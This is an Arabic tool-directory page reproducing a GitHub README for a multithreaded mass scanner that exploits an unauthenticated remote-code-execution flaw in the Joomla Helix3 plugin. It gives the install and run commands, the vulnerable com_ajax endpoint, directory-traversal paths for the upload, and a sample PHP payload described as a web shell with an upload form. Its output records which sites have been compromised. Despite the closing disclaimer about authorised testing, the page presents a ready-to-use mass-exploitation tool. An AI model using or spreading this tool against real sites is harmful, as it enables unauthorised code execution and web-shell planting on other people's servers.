Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/jenderal92/cve-2026-49049
ماسحات الثغرات الأمنيةماسحات الثغرات الأمنية للويبتوليد الحمولةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubjenderal92/cve-2026-49049

CVE-2026-49049

ماسح ضوئي شامل للثغرات لـ CVE-2026-49049 – تنفيذ تعليمات برمجية عن بُعد غير مصادق عليه في إضافة Joomla Helix3. متعدد الخيوط، يكتشف حمولات PHP المنفذة والخفام.

عرض المستودع
113منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ماسح CVE-2026-49049 الشامل

ماسح ثغرات شامل لـ CVE-2026-49049 - تنفيذ كود عن بُعد بدون مصادقة في إطار عمل Joomla Helix3.


📌 الوصف

تقوم هذه الأداة بفحص عدة مواقع Joomla للتحقق من ثغرة CVE-2026-49049 الموجودة في إضافة Helix3. تسمح هذه الثغرة لمهاجم غير مصادق عليه برفع وتنفيذ كود PHP عشوائي على الخادم المستهدف.

يحاول الماسح القيام بما يلي:

  1. استغلال نقطة النهاية com_ajax مع إضافة helix3.
  2. رفع ملف PHP غير ضار (معلومات/حمولة).
  3. اكتشاف ما إذا كان الملف يُنفَّذ أم يُخزَّن فقط كـ PHP خام.

⚡ الميزات

  • فحص شامل مع تعدد الخيوط (20 خيطًا افتراضيًا).
  • وضعان للكشف:
    • ✅ ثغرة قابلة للاستغلال – يتم تنفيذ كود PHP (نجاح RCE).
    • ⚠️ PHP خام – تم رفع الملف ولكن لم يتم تنفيذه (كشف الكود).
  • توليد تلقائي للحمولة بأسماء ملفات عشوائية.
  • حفظ المخرجات في ملفات منفصلة لمزيد من التحليل.
  • خفيف الوزن وسريع مع معالجة المهلة الزمنية.

📦 المتطلبات الأساسية

  • Python 2.7
  • مكتبة requests
root@kitploit:~
pip install requests

🛠 التثبيت

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-49049.git
cd CVE-2026-49049
chmod +x cve-2026-49049.py

🚀 الاستخدام

root@kitploit:~
python2 cve-2026-49049.py targets.txt

صيغة الإدخال

يجب أن يحتوي كل سطر في targets.txt على نطاق أو عنوان IP واحد:

root@kitploit:~
example.com
https://example.com
http://192.168.1.100

ملفات المخرجات

الملف الوصف results.txt عناوين URL المعرضة للثغرة حيث تم تنفيذ الحمولة rez.txt عناوين URL حيث تم رفع الحمولة دون تنفيذها (PHP خام)


مثال على المخرجات

root@kitploit:~
============================================================
CVE-2026-49049 Mass Scanner
Results: results.txt (executed)
Raw PHP: rez.txt (not executed)
============================================================

[*] Loaded 150 targets
[*] Using 20 threads

[+] VULNERABLE: https://target.com
[*] RAW PHP: https://target2.com
[-] NOT VULNERABLE: https://secure.com

============================================================
[+] Selesai!
[+] Vulnerable: 12
[+] Raw PHP: 5

[+] Vulnerable URLs:
    https://target.com/tmp_123456.php.json

⚙️ الإعدادات

يمكنك تعديل المتغيرات التالية داخل السكربت:

المتغير الافتراضي الوصف THREADS 20 عدد الخيوط المتزامنة PATHS ['../../../', '../../../../'] مسارات اجتياز الدليل TIMEOUT 5 مهلة طلب HTTP RESULT_FILE 'results.txt' ملف الإخراج للمواقع المعرضة للثغرة RAW_RESULT_FILE 'rez.txt' ملف الإخراج لمواقع PHP الخام


🧠 كيف يعمل

يرسل السكربت طلب POST إلى:

root@kitploit:~
/index.php?option=com_ajax&plugin=helix3&format=json

مع حمولة تقوم بما يلي:

  1. تحديد مسار اجتياز الدليل (مثل ../../../)
  2. رفع ملف PHP باسم عشوائي
  3. يحتوي على صفحة ويب شل / معلومات بسيطة

ثم يتحقق مما إذا كان الملف متاحًا وما إذا كان كود PHP يُنفَّذ أم يُعرض كنص عادي فقط.

مثال على الحمولة

root@kitploit:~
<?php
$s = "Shinday";
echo '<center><pre><br><br><h1 style="color:red;">'.$s.'</h1><br>'.php_uname()."\n".'<br><br><br>';
// ... upload form
?>

⚠️ إخلاء المسؤولية

هذه الأداة مخصصة للأغراض التعليمية وللاختبار المصرح به فقط.

الاستخدام غير المصرح به لهذه الأداة ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها يعد أمرًا غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.

لمزيد من إخلاء المسؤولية يمكنك الاطلاع على إخلاء المسؤولية في غلاف Jenderal92. يمكنك التحقق منه هنا !!!


تنزيل الأداة